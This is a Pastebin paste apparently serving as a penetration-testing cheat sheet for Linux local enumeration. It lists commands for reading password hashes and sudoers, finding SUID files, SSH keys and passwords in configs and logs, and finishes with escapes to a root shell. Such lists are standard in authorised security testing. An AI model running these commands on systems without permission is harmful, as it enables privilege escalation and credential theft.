Advertisement
opexxx

linuxenumeration

Feb 25th, 2015
358
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 7.02 KB | None | 0 0
  1. Kernel, Operating System & Device Information:
  2. Command     Result
  3. uname -a    Print all available system information
  4. uname -r    Kernel release
  5. uname -n    System hostname
  6. hostname    As above
  7. uname -m    Linux kernel architecture (32 or 64 bit)
  8. cat /proc/version   Kernel information
  9. cat /etc/*-release  Distribution information
  10. cat /etc/issue  As above
  11. cat /proc/cpuinfo   CPU information
  12. df -a   File system information
  13.  
  14.  
  15.  
  16. Users & Groups:
  17. Command     Result
  18. cat /etc/passwd     List all users on the system
  19. cat /etc/group  List all groups on the system
  20. for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null    List all uid’s and respective group memberships
  21. cat /etc/shadow     Show user hashes – Privileged command
  22. grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'     List all super user accounts
  23. finger  Users currently logged in
  24. pinky   As above
  25. users   As above
  26. who -a  As above
  27. w   Who is currently logged in and what they’re doing
  28. last    Listing of last logged on users
  29. lastlog     Information on when all users last logged in
  30. lastlog –u %username%     Information on when the specified user last logged in
  31. lastlog |grep -v "Never"    Entire list of previously logged on users
  32.  
  33.  
  34.  
  35. User & Privilege Information:
  36. Command     Result
  37. whoami  Current username
  38. id  Current user information
  39. cat /etc/sudoers    Who’s allowed to do what as root – Privileged command
  40. sudo -l     Can the current user perform anything as root
  41. sudo -l 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\
  42. |'more'\|'less'\|'vi'\|'vim'\|'nc'\|'netcat'\|python\
  43. |ruby\|lua\|irb' | xargs -r ls -la 2>/dev/null  Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.
  44.  
  45.  
  46.  
  47. Environmental Information:
  48. Command     Result
  49. env     Display environmental variables
  50. set     As above
  51. echo $PATH  Path information
  52. history     Displays command history of current user
  53. pwd     Print working directory, i.e. ‘where am I’
  54. cat /etc/profile    Display default system variables
  55. cat /etc/shells     Display available shells
  56.  
  57.  
  58.  
  59. Interesting Files:
  60. Command     Result
  61. find / -perm -4000 -type f 2>/dev/null  Find SUID files
  62. find / -uid 0 -perm -4000 -type f 2>/dev/null   Find SUID files owned by root
  63. find / -perm -2000 -type f 2>/dev/null  Find GUID files
  64. find / -perm -2 -type f 2>/dev/null     Find world-writeable files
  65. find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null   Find world-writeable files excluding those in /proc
  66. find / -perm -2 -type d 2>/dev/null     Find word-writeable directories
  67. find /home –name *.rhosts -print 2>/dev/null  Find rhost config files
  68. find /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;     Find *.plan files, list permissions and cat the file contents
  69. find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;     Find hosts.equiv, list permissions and cat the file contents
  70. ls -ahlR /root/     See if you can access other user directories to find interesting files
  71. cat ~/.bash_history     Show the current userscommand history
  72. ls -la ~/.*_history     Show the current users’ various history files
  73. ls -la /root/.*_history     Can we read root’s history files
  74. ls -la ~/.ssh/  Check for interesting ssh files in the current users’ directory
  75. find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la    Find SSH keys/host information
  76. ls -la /usr/sbin/in.*   Check Configuration of inetd services
  77. grep -l -i pass /var/log/*.log 2>/dev/null  Check log files for keywords (‘pass’ in this example) and show positive matches
  78. find /var/log -type f -exec ls -la {} \; 2>/dev/null    List files in specified directory (/var/log)
  79. find /var/log -name *.log -type f -exec ls -la {} \; 2>/dev/null    List .log files in specified directory (/var/log)
  80. find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/null  List .conf files in /etc (recursive 1 level)
  81. ls -la /etc/*.conf  As above
  82. find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} \; 2>/dev/null   Find .conf files (recursive 4 levels) and output line number where the word ‘password’ is located
  83. lsof -i -n  List open files (output will depend on account privileges)
  84. head /var/mail/root     Can we read roots mail
  85.  
  86.  
  87.  
  88. Service Information:
  89. Command     Result
  90. ps aux | grep root  View services running as root
  91. ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'  Lookup process binary path and permissions
  92. cat /etc/inetd.conf     List services managed by inetd
  93. cat /etc/xinetd.conf    As above for xinetd
  94. cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null    A very ‘rough’ command to extract associated binaries from xinetd.conf and show permissions of each
  95. ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null   Permissions and contents of /etc/exports (NFS)
  96.  
  97.  
  98.  
  99. Jobs/Tasks:
  100. Command     Result
  101. crontab -l -u %username%    Display scheduled jobs for the specified user – Privileged command
  102. ls -la /etc/cron*   Scheduled jobs overview (hourly, daily, monthly etc)
  103. ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null   What can ‘others’ write in /etc/cron* directories
  104. top     List of current tasks
  105.  
  106.  
  107.  
  108. Networking, Routing & Communications:
  109. Command     Result
  110. /sbin/ifconfig -a   List all network interfaces
  111. cat /etc/network/interfaces     As above
  112. arp -a  Display ARP communications
  113. route   Display route information
  114. cat /etc/resolv.conf    Show configured DNS sever addresses
  115. netstat -antp   List all TCP sockets and related PIDs (-p Privileged command)
  116. netstat -anup   List all UDP sockets and related PIDs (-p Privileged command)
  117. iptables -L     List rules – Privileged command
  118. cat /etc/services   View port numbers/services mappings
  119.  
  120.  
  121.  
  122. Programs Installed:
  123. Command     Result
  124. dpkg -l     Installed packages (Debian)
  125. rpm -qa     Installed packages (Red Hat)
  126. sudo -V     Sudo version – does an exploit exist?
  127. httpd -v    Apache version
  128. apache2 -v  As above
  129. apache2ctl (or apachectl) -M    List loaded Apache modules
  130. mysql --version     Installed MYSQL version details
  131. psql -V     Installed Postgres version details
  132. perl -v     Installed Perl version details
  133. java -version   Installed Java version details
  134. python --version    Installed Python version details
  135. ruby -v     Installed Ruby version details
  136. find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc)   Locate ‘useful’ programs (netcat, wget etc)
  137. which %program_name% (i.e. nc, netcat, wget, nmap etc)  As above
  138. dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null   List available compilers
  139. cat /etc/apache2/envvars 2>/dev/null |grep -i 'user\|group' |awk '{sub(/.*\export /,"")}1'
  140.  
  141.     Which account is Apache running as
  142.  
  143.  
  144.  
  145. Common Shell Escape Sequences:
  146. Command     Program(s)
  147. :!bash  vi, vim
  148. :set shell=/bin/bash:shell  vi, vim
  149. !bash   man, more, less
  150. find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;  find
  151. awk 'BEGIN {system("/bin/bash")}'   awk
  152. --interactive   nmap
  153. perl -e 'exec "/bin/bash";'     Perl
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement